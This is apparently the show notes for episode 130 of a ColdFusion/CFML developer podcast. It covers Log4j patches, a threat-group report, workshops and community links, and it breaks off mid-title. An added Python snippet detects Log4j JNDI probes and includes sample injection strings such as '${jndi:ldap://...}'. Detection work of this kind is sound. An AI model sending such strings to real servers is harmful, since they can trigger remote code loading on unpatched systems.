2022-01-11 Weekly News - Episode 130
Watch the video version on YouTube at https://youtu.be/BkIKAlDLFkQ
Hosts:
Gavin Pickin - Senior Software Developer for Ortus Solutions
Eric Peterson - Senior Software Developer for Ortus Solutions
Thanks to our Sponsor - Ortus Solutions
The makers of ColdBox, CommandBox, ForgeBox, TestBox and almost every other Box out there.
A few ways to say thanks back to Ortus Solutions:
Patreon Support
We have 37 patreons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site: https://www.patreon.com/ortussolutions.
News and Events
Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley
January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today: https://www.ortussolutions.com/events/webinars
Log4j Updates
Log4j 2.17.1 patch released. CommandBox images have been updated with the latest patched Log4j jars.
Adobe has an updated technote: https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries, such as Spreadsheet-CFML, have updated as well.
Note: Log4j2 support in Lucee 5.3 is coming along for 5.3.9.
‘Elephant Beetle’ Lurks for Months in Networks
The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI
Adobe Workshops
More Adobe #ColdFusion Workshops announced, led by Damien Bruyndonckx
Two dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
https://cf-workshop.meetus.adobeevents.com/
AngularJS EOL’ed 12/31/2021
As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue
CFCasts Content Updates
https://www.cfcasts.com
Just Released
Coming soon
Send your suggestions at https://cfcasts.com/support
Conferences and Training
VueJS Nation Conference
Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/
More conferences
Need more conferences? This site has a huge list of conferences for almost any language or community.
https://confs.tech/
Blogs, Tweets and Videos of the Week
Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron
Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover
Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace).
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17
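As an added illustration (not James Moberg's CFML code), a minimal Python version of the detection approach the post describes: strip whitespace and case, then look for JNDI lookups using the ldap, ldaps, rmi or dns schemes in request headers and parameters. The sample requests are constructed for the self-check.

```python
import re

# Schemes the post's updated rules block (ldap plus rmi, ldaps and dns).
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns):")


def normalize(value: str) -> str:
    """Remove all whitespace and lowercase, so padding inside the lookup
    (e.g. '$ { jndi : ... }') or case changes do not hide the marker."""
    return re.sub(r"\s+", "", value).lower()


def is_log4j_probe(value: str) -> bool:
    """True if the normalized value contains a ${jndi:<scheme>: lookup."""
    return JNDI_PATTERN.search(normalize(value)) is not None


def scan_request(headers: dict, params: dict) -> list:
    """Check every header and parameter value; return (source, name) hits
    so the caller can log or block the request."""
    hits = []
    for source, mapping in (("header", headers), ("param", params)):
        for name, value in mapping.items():
            if is_log4j_probe(value):
                hits.append((source, name))
    return hits


# Constructed sample requests (not real traffic) for a self-check.
SAMPLE_REQUESTS = [
    {"headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0)"},
     "params": {"q": "coldfusion log4j"}},
    {"headers": {"User-Agent": "${jndi:ldap://probe.example.invalid/a}"},
     "params": {}},
    {"headers": {"User-Agent": "curl/7.79"},
     "params": {"name": "$ { JNDI : rmi://probe.example.invalid/x }"}},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(scan_request(req["headers"], req["params"]))
```

Normalization here covers only whitespace and case, as the post describes; treat a hit as a signal to log and review alongside patching, not as the only control.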
Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml
#lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster
Blog - Ben Nadel - Building An API Client With The fet...